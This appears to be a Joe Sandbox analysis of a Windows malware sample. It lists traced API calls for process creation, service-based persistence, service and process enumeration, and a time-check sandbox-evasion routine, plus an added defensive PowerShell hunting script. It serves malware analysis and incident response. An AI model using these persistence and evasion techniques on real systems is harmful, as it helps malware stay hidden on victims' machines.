• Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1332871344.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1332916326.0000000000EF7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1332933550.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1332933550.0000000000EFE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1332933550.0000000000F39000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1332933550.0000000000F4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1333011841.0000000000F4B000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
Similarity
• API ID: File$CloseCreate$ChangeCountFindHandleNotificationReadTickWrite
• String ID:
• API String ID: 688250028-0
• Opcode ID: b4c73c3def3c56f82adf71cdd6bee5ade527732cead8f7bb7944cc57ca1fb739
• Instruction ID: d7381e5fe44d67d26ce6bd28d4b4684cf117103207dbf4625dcd88b56cb23a3d
• Opcode Fuzzy Hash: b4c73c3def3c56f82adf71cdd6bee5ade527732cead8f7bb7944cc57ca1fb739
• Instruction Fuzzy Hash: 20E18875A0020CDFC304EF24FD45BB93BB6FB91720B204119E946A72F4E7315956EB95

Control-flow Graph

Control-flow graph of the function at 00EEFA80 (rendered graph omitted; basic blocks eefa80-eefcb3). API calls along its paths: CreateProcessA, CloseHandle (twice).
APIs
• CreateProcessA.KERNELBASE(?,H,00000000,00000000,00000000,00000008,00000000,00000000,00000044,?,?,?,?,?,?,00000000), ref: 00EEFBF1
• CloseHandle.KERNEL32(H,?,?,?,?,?,00000000), ref: 00EEFC2F
• CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 00EEFC58
Memory Dump Source
• Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
Similarity
• API ID: CloseHandle$CreateProcess
• String ID: D$H$H
• API String ID: 2922976086-2225610527
• Opcode ID: 4c2cdf287489fc7ec8188ebad2148146f7b569b55f5a440401a03c01a516566e
• Instruction ID: ada8365f708f224c5d1746546e22edc7c151adcb40b97f0835fb39d4653d6145
• Opcode Fuzzy Hash: 4c2cdf287489fc7ec8188ebad2148146f7b569b55f5a440401a03c01a516566e
• Instruction Fuzzy Hash: 29513171A5121CDBD744DF64FC427B63BFAF748B21F04401AE806D62B4EBB49460EB85

Control-flow Graph

Control-flow graph of the function at 00ED1D90 (rendered graph omitted; basic blocks ed1d90-ed20ca). API calls along its paths: CreateFileA, WriteFile, CloseHandle.
APIs
  • Part of subcall function 00EE3110: WaitForSingleObject.KERNEL32(?,00004E20,?,00ECD0F2,00000128), ref: 00EE31AD
• CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00ED1E7B
  • Part of subcall function 00EEFCC0: ReleaseMutex.KERNEL32(00ECD410,?,00ECD410,00000128), ref: 00EEFCE9
Memory Dump Source
• Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
Similarity
• API ID: CreateFileMutexObjectReleaseSingleWait
• String ID:
• API String ID: 1564016613-0
• Opcode ID: db32f4edd44b61ec1ef7aca3b032377dfac11f720570e56071b582ccdfd8a1c1
• Instruction ID: 09f1c238c0a45821197997f9845d06eae46076ac11e72c56d52a2dfca07e9fbe
• Opcode Fuzzy Hash: db32f4edd44b61ec1ef7aca3b032377dfac11f720570e56071b582ccdfd8a1c1
• Instruction Fuzzy Hash: 3371413560120CDFD704CF65FC89A2A3BB6FBA4314F02815AE941A32B0DB70A961FF81

Control-flow Graph

Control-flow graph of the function at 00ED2EB0 (rendered graph omitted; basic blocks ed2eb0-ed2f57). API calls along its paths: GetProcessHeap, RtlFreeHeap.
APIs
• GetProcessHeap.KERNEL32(00000000,00ED0367,?,00ED0367,00000000), ref: 00ED2ED1
• RtlFreeHeap.NTDLL(00000000,?,00ED0367,00000000), ref: 00ED2ED8
Memory Dump Source
• Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
Similarity
• API ID: Heap$FreeProcess
• String ID:
• API String ID: 3859560861-0
• Opcode ID: 5a4547048a7e7c6b2f2a96dbc1db343c94c7b6be050ae117867db34f4bcb16b8
• Instruction ID: a8c201e9746559d9db5bf1fccaafd57362cef9e1271ae68659cfabb70cfbbbb0
• Opcode Fuzzy Hash: 5a4547048a7e7c6b2f2a96dbc1db343c94c7b6be050ae117867db34f4bcb16b8
• Instruction Fuzzy Hash: 32012B7960824CCFC314DF65FE965353BF6F798724701420AE60AAB2B1D3309895EB55

Control-flow Graph

Control-flow graph of the function at 00EE45A9 (rendered graph omitted; basic blocks ee45a9-ee4699). API call along its paths: ExitProcess.
Memory Dump Source
• Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ExitProcess
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 621844428-0
                                                                                                                                                                                                            • Opcode ID: 09cd121e620a7544c3ff32f1b7e06e7377e97674aefbbff9db3646266ac141e8
                                                                                                                                                                                                            • Instruction ID: 113b037200e4e01ce5988e002af3c5481306ec5910132a94588630a77defa697
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 09cd121e620a7544c3ff32f1b7e06e7377e97674aefbbff9db3646266ac141e8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 32110475A1220ECBD710FF71FE8952637F1F7A13153015426E082E62B9EB759815FB82

Control-flow Graph

• Nodes: 886 ec2800-ec2832 (call eeb150); 889 ec283e-ec2842 (ExitProcess); 890 ec2834
• Edges: 886->889, 886->890, 890->889
APIs
Similarity
• API ID: ExitProcess
• String ID:
• API String ID: 621844428-0
• Opcode ID: 3196dac6aa140ef1ea46b6d718afaf5324932ff6671361c7928fa85f5b93d871
• Instruction ID: 4c4f80d94e352bef4330c9021870d35e434c705639041051a5c6f3fd8dd43b14
• Opcode Fuzzy Hash: 3196dac6aa140ef1ea46b6d718afaf5324932ff6671361c7928fa85f5b93d871
• Instruction Fuzzy Hash: 75E0863C00520D8FC308DF16D89687637B6A7C5304374C41F9A152B660D635E44DDF51

Control-flow Graph

• Nodes: 891 eca4e0-eca53a (lstrlen); 892 eca53c-eca548; 893 eca54e-eca564
• Edges: 891->892, 891->893, 892->893
APIs
Similarity
• API ID: lstrlen
• String ID:
• API String ID: 1659193697-0
• Opcode ID: e9b50138ab0e6cdd2ecf88f7300384c4980ba23b4c958ba5b2adcab1dd5ead4a
• Instruction ID: c148535b02ceb4207ddb9c2705f4a60436550cda96724510db873cef27b3e0da
• Opcode Fuzzy Hash: e9b50138ab0e6cdd2ecf88f7300384c4980ba23b4c958ba5b2adcab1dd5ead4a
• Instruction Fuzzy Hash: 24F0AF7160122CEFD7059F22FD0A46637BAFB993713404012E885A2179EB745825FB96
Strings
Similarity
• API ID:
• String ID: XH$/$U][v
• API String ID: 0-1996962770
• Opcode ID: b0a2cf9300248b28fa393e2a1b27f6e3a606c034a0ac0c3603443c612df5ab56
• Instruction ID: cbe0f87bfdac8801b97cea0c1c6a0be83935b3264ee718a0d5ec8a412daff1eb
• Opcode Fuzzy Hash: b0a2cf9300248b28fa393e2a1b27f6e3a606c034a0ac0c3603443c612df5ab56
• Instruction Fuzzy Hash: 4BB27775A0020DCFD704EF21FD856B93BB6FB94320F11805AE946A72B4EB3159A5EF81
APIs
Strings
Similarity
• API ID: HeapProcess
• String ID: #~\
• API String ID: 54951025-95464956
• Opcode ID: 0f14a7ff8b49ee4d187eadd86658bd0ed28830fc4eb61aec6352567a91e704de
• Instruction ID: 8262bad689ff011e193079c5e0aa01672e184a4ddc4949e8e0f70e34f3182357
• Opcode Fuzzy Hash: 0f14a7ff8b49ee4d187eadd86658bd0ed28830fc4eb61aec6352567a91e704de
• Instruction Fuzzy Hash: 5E722175A0020DCFC304EF25FD856A53BB6FB94320B11912AE841E73B0E77498A6FB91
Strings
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: wvsprintf
                                                                                                                                                                                                            • String ID: %$0$X$d$d$d$l$l$o$p$p$x
                                                                                                                                                                                                            • API String ID: 2795597889-2884493731
                                                                                                                                                                                                            • Opcode ID: f92f6c8f449a6c116e7da17c7583849869964869bc8fcd6d93e38e0f14c7f5c0
                                                                                                                                                                                                            • Instruction ID: 9070dabbae8be345e3bf625040ac53bee3abf63df550c7025a6c7687842f72a1
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f92f6c8f449a6c116e7da17c7583849869964869bc8fcd6d93e38e0f14c7f5c0
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3DD26AB5A0464DCFD704DF26FD892643BB2FBA5360B225016D881E72B4E73488A5FF85
APIs
• OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 00ED0537
• CreateServiceA.ADVAPI32(00000000,015BFCE0,015BFCE0,000F01FF,00000110,00000002,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00ED0596
• ChangeServiceConfig2A.ADVAPI32(00000000,00000001,?), ref: 00ED0615
• StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00ED062A
• CloseServiceHandle.ADVAPI32(00000000), ref: 00ED06A7
• OpenServiceA.ADVAPI32(00000000,015BFCE0,00000010), ref: 00ED06EB
• StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00ED072D
• CloseServiceHandle.ADVAPI32(00000000), ref: 00ED073E
• CloseServiceHandle.ADVAPI32(00000000), ref: 00ED07A8
Decoded arguments (Win32 SDK constants): OpenSCManagerA is opened with 0x2 = SC_MANAGER_CREATE_SERVICE. CreateServiceA is called with dwDesiredAccess 0xF01FF = SERVICE_ALL_ACCESS, dwServiceType 0x110 = SERVICE_WIN32_OWN_PROCESS (0x10) | SERVICE_INTERACTIVE_PROCESS (0x100), dwStartType 0x2 = SERVICE_AUTO_START and dwErrorControl 0 = SERVICE_ERROR_IGNORE; service name and display name point at the same heap buffer (015BFCE0), and the binary path argument was not resolved by the tracer (?). ChangeServiceConfig2A with dwInfoLevel 1 = SERVICE_CONFIG_DESCRIPTION sets a description before the first StartServiceA. The second OpenServiceA(…, 0x10 = SERVICE_START) / StartServiceA pair on the same name has the shape of a fallback taken when CreateServiceA does not return a handle, e.g. because the service already exists; this matches the "Modifies existing windows services" signature. An interactive, auto-start, own-process service is a persistence profile worth hunting for on the host (see the added triage example below the service-enumeration function).
Memory Dump Source
• Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1332871344.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1332916326.0000000000EF7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1332933550.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1332933550.0000000000EFE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1332933550.0000000000F39000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1332933550.0000000000F4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1333011841.0000000000F4B000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
Similarity
• API ID: Service$CloseHandle$OpenStart$ChangeConfig2CreateManager
• String ID:
• API String ID: 3525021261-0
• Opcode ID: 2214fe1248702ba8f81ba9057f2485effb5338c68e003484a3838755ac39b9e0
• Instruction ID: 60df90658ae7eec91d8b4e6a17983b0f088a7cc6418ae2c137ac9eb754ed44ab
• Opcode Fuzzy Hash: 2214fe1248702ba8f81ba9057f2485effb5338c68e003484a3838755ac39b9e0
• Instruction Fuzzy Hash: CB61423564230CEFD3019F60FC8AB6A3BB1FBA2711F168406E941AA2B4DBB45461FF45
APIs
• OpenSCManagerA.ADVAPI32(00000000,00000000,80000000), ref: 00ECB0AA
• EnumServicesStatusA.ADVAPI32(00000000,00000030,00000003,?,00000024,?,?,00000000), ref: 00ECB15A
• GetLastError.KERNEL32 ref: 00ECB17A
• EnumServicesStatusA.ADVAPI32(00000000,00000030,00000003,00000000,?,?,?,00000000), ref: 00ECB216
• CloseServiceHandle.ADVAPI32(00000000), ref: 00ECB41C
Decoded arguments (Win32 SDK constants): OpenSCManagerA is opened with 0x80000000 = GENERIC_READ, which the SCM maps to SC_MANAGER_ENUMERATE_SERVICE | SC_MANAGER_QUERY_LOCK_STATUS | STANDARD_RIGHTS_READ, so this routine only lists services. EnumServicesStatusA is asked for dwServiceType 0x30 = SERVICE_WIN32 (own-process | share-process) and dwServiceState 3 = SERVICE_STATE_ALL. The first call passes cbBufSize 0x24 = 36 = sizeof(ENUM_SERVICE_STATUSA), i.e. room for a single entry; the GetLastError that follows is the standard check for ERROR_MORE_DATA, after which the call is repeated with the pcbBytesNeeded-sized buffer. This is the "Contains functionality to enumerate running services" behaviour listed in the signatures; the report does not show which service names the result is compared against.
Memory Dump Source
• Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1332871344.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1332916326.0000000000EF7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1332933550.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1332933550.0000000000EFE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1332933550.0000000000F39000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1332933550.0000000000F4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1333011841.0000000000F4B000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
Similarity
• API ID: EnumServicesStatus$CloseErrorHandleLastManagerOpenService
• String ID:
• API String ID: 1579346331-0
• Opcode ID: be5db060266a1e2c42a24536c0bb124873ca20b2c94a3ffbc3cfc4d14e99f905
• Instruction ID: 02a1415922848d758417c2b662cf5993eb1abc3f7aa7acc23bd58be981068896
• Opcode Fuzzy Hash: be5db060266a1e2c42a24536c0bb124873ca20b2c94a3ffbc3cfc4d14e99f905
• Instruction Fuzzy Hash: 91F166B6A0120DDFC704DF65FD86B6A3BB6F794320F114019E942E32B4E73598A5EB81
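Added triage example, not part of the Joe Sandbox report and not code recovered from the sample: the two service routines above (the CreateServiceA installer at 00ED0596 and the EnumServicesStatusA walker at 00ECB15A) tell an incident responder what to look for on a host, namely a service registered as SERVICE_WIN32_OWN_PROCESS | SERVICE_INTERACTIVE_PROCESS (Type 0x110) with SERVICE_AUTO_START (Start 2) and a freshly written Description. Because the service name lives in a heap buffer (015BFCE0) that the report does not resolve, the check below hunts on that configuration shape via the registry values the SCM persists, and correlates each hit with System event 7045 ("A service was installed in the system"), which is logged for every successful CreateService call. Function names are the author's own; run it elevated.

```powershell
# Added example for this report: find services configured the way the sample's
# installer routine configures its service, then correlate with install events.
# Constants come from the Win32 SDK (winsvc.h), matching the traced CreateServiceA arguments.
$SERVICE_WIN32_OWN_PROCESS   = 0x010
$SERVICE_INTERACTIVE_PROCESS = 0x100
$SERVICE_AUTO_START          = 2

function Get-SuspiciousServiceConfig {
    # The SCM stores the CreateService parameters under HKLM\SYSTEM\CurrentControlSet\Services\<name>:
    # Type (dwServiceType), Start (dwStartType), ImagePath (lpBinaryPathName) and the Description
    # written by ChangeServiceConfig2(SERVICE_CONFIG_DESCRIPTION). They persist even if StartService fails.
    $root = 'HKLM:\SYSTEM\CurrentControlSet\Services'
    foreach ($key in Get-ChildItem -Path $root -ErrorAction SilentlyContinue) {
        $p = Get-ItemProperty -Path $key.PSPath -ErrorAction SilentlyContinue
        if ($null -eq $p.Type -or $null -eq $p.Start) { continue }   # driver/device keys without a full config
        $ownProcess  = ($p.Type -band $SERVICE_WIN32_OWN_PROCESS)   -ne 0
        $interactive = ($p.Type -band $SERVICE_INTERACTIVE_PROCESS) -ne 0
        # Interactive services are off by default since Windows 8 (NoInteractiveServices = 1),
        # so own-process + interactive + auto-start is a rare and therefore useful pivot.
        if ($ownProcess -and $interactive -and $p.Start -eq $SERVICE_AUTO_START) {
            [pscustomobject]@{
                Name        = $key.PSChildName
                Type        = ('0x{0:X}' -f [int]$p.Type)
                Start       = [int]$p.Start
                ImagePath   = $p.ImagePath
                Description = $p.Description
                Account     = $p.ObjectName
            }
        }
    }
}

function Get-RecentServiceInstalls {
    param([int]$Days = 7)
    # System/7045 (Service Control Manager) carries ServiceName, ImagePath, ServiceType,
    # StartType and AccountName as EventData fields; parse the XML rather than trusting Message text.
    $filter = @{ LogName = 'System'; Id = 7045; StartTime = (Get-Date).AddDays(-$Days) }
    foreach ($e in Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue) {
        $d = ([xml]$e.ToXml()).Event.EventData.Data
        [pscustomobject]@{
            Time        = $e.TimeCreated
            ServiceName = ($d | Where-Object Name -eq 'ServiceName').'#text'
            ImagePath   = ($d | Where-Object Name -eq 'ImagePath').'#text'
            ServiceType = ($d | Where-Object Name -eq 'ServiceType').'#text'
            StartType   = ($d | Where-Object Name -eq 'StartType').'#text'
            Account     = ($d | Where-Object Name -eq 'AccountName').'#text'
        }
    }
}

# Usage: list configuration hits and mark those that were installed within the last week.
$recent = Get-RecentServiceInstalls -Days 7
Get-SuspiciousServiceConfig | ForEach-Object {
    $name = $_.Name
    $installed = @($recent | Where-Object ServiceName -eq $name)
    $_ | Add-Member -NotePropertyName InstalledRecently -NotePropertyValue ($installed.Count -gt 0) -PassThru |
         Add-Member -NotePropertyName InstallTime       -NotePropertyValue ($installed | Select-Object -First 1 -ExpandProperty Time) -PassThru
} | Format-List
```

A hit with InstalledRecently = True, an ImagePath under a user-writable or system directory that does not belong to a known product, and an Account of LocalSystem is the profile the traced routine produces; the 7045 record also gives the install time to pivot into process-creation and file-write telemetry for the dropped file.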
APIs
• GetSystemTime.KERNEL32(}$,00000001,?,?,00EE247D), ref: 00EF518C
• GetTickCount.KERNEL32 ref: 00EF52BE
GetSystemTime returns the UTC wall-clock time; GetTickCount returns milliseconds since boot. Reading both in one routine is the pattern behind the "Found evasive API chain (date check)" signature: the sample can compare wall-clock time against uptime to notice a freshly booted analysis VM, or detect that a sleep was skipped or accelerated by the sandbox (see "Sample execution stops while process was sleeping"). The report does not show the thresholds compared against.
Strings
Memory Dump Source
• Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1332871344.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1332916326.0000000000EF7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1332933550.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1332933550.0000000000EFE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1332933550.0000000000F39000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1332933550.0000000000F4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1333011841.0000000000F4B000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
Similarity
• API ID: CountSystemTickTime
• String ID: @AB $}$
• API String ID: 2164215191-3602920818
• Opcode ID: bd3704033cc7f82c0a961be74820690f9b60e91924dad0054261ad1bd9bc782e
• Instruction ID: 765e2a9f2acaf89155237627480628b436d4ba662941e2424be251b14029a41f
• Opcode Fuzzy Hash: bd3704033cc7f82c0a961be74820690f9b60e91924dad0054261ad1bd9bc782e
• Instruction Fuzzy Hash: EA51EC76A1560CCFD308DF69FD895263BF2F7A53203014115E986D72B4EBB488A0FB85
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00ED21D0
• Process32First.KERNEL32(00000000,00000128), ref: 00ED2257
• Process32Next.KERNEL32(00000000,00000128), ref: 00ED2384
• CloseHandle.KERNEL32(00000000), ref: 00ED2426
Decoded arguments: CreateToolhelp32Snapshot with dwFlags 0x2 = TH32CS_SNAPPROCESS and th32ProcessID 0 snapshots every process on the system. The 0x128 shown for Process32First/Process32Next equals 296 = sizeof(PROCESSENTRY32) for the ANSI structure in a 32-bit process, i.e. the dwSize field that must be initialised before the first call. The routine is therefore a standard walk over all running processes (szExeFile / th32ProcessID); the report does not show which process names it matches, so whether this serves analysis-tool detection, self-check or target selection cannot be stated from this listing.
Memory Dump Source
• Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1332871344.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1332916326.0000000000EF7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1332933550.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1332933550.0000000000EFE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1332933550.0000000000F39000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1332933550.0000000000F4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1333011841.0000000000F4B000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
Similarity
• API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
• String ID:
• API String ID: 420147892-0
• Opcode ID: 8de0e581005b55fb8bf2f9f1a695af12dcf37754eb8fe65ba9ad98ae15d4d886
• Instruction ID: d20da305f84c8c89875634466f27b0827bc64a6296ca5487741141a7666023ed
• Opcode Fuzzy Hash: 8de0e581005b55fb8bf2f9f1a695af12dcf37754eb8fe65ba9ad98ae15d4d886
• Instruction Fuzzy Hash: BC9125B1A0131CCFD710DF25FC886A537B6FBA0320F15801AD942A22B4EB7499A6FF55
Strings
Memory Dump Source
• Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1332871344.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1332916326.0000000000EF7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1332933550.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1332933550.0000000000EFE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1332933550.0000000000F39000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1332933550.0000000000F4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1333011841.0000000000F4B000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
Similarity
• API ID:
                                                                                                                                                                                                            • String ID: ${mYr
                                                                                                                                                                                                            • API String ID: 0-2876023986
                                                                                                                                                                                                            • Opcode ID: cf414f53df31c1998e730feea7a9970b28ea201115dabeafe609a10f3b893afe
                                                                                                                                                                                                            • Instruction ID: 08fbd8687f5d635e050320b5166275db806c9cf85e92e4563ad685388e36ba89
                                                                                                                                                                                                            • Opcode Fuzzy Hash: cf414f53df31c1998e730feea7a9970b28ea201115dabeafe609a10f3b893afe
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 63222675A0020DCFC704EF24FE81A7637F6F794321B00812AE945A63B5EB759856EB91
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332871344.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332916326.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1333011841.0000000000F4B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: $C@% $t?Wx
                                                                                                                                                                                                            • API String ID: 0-2869517708
                                                                                                                                                                                                            • Opcode ID: 62a031e75935b5c04bc132a3ed8e28a3a5af0ca7165661a8464ae4b985f1e9f0
                                                                                                                                                                                                            • Instruction ID: 4e0880652cd1c6a497a41d40c8c1d16118d5f3de37a59e28d25b832865751589
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 62a031e75935b5c04bc132a3ed8e28a3a5af0ca7165661a8464ae4b985f1e9f0
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6BB24375A0020DCFCB04DF65FD855A977F2FB98320715811AD842A73B4EB7499A2EF80
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332871344.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332916326.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1333011841.0000000000F4B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: l$p R
                                                                                                                                                                                                            • API String ID: 0-2271698361
                                                                                                                                                                                                            • Opcode ID: 7aa7aa6c3cd3af6b6db58d4cb1a54ce8823498b0a65a238e4c21a5de8fc932cf
                                                                                                                                                                                                            • Instruction ID: 37eeeb1a805bff7afd814a90d26be99e3c459dcf277c4d04976e624e0cc7dcc7
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7aa7aa6c3cd3af6b6db58d4cb1a54ce8823498b0a65a238e4c21a5de8fc932cf
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 57E267B5A0064DCFC704DF26FD851A93BB2F7A5360712801AD882E72B4E77488A5FF85
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332871344.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332916326.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFE000.00000004.00000001.01000000.00000003.sdmpDownload File
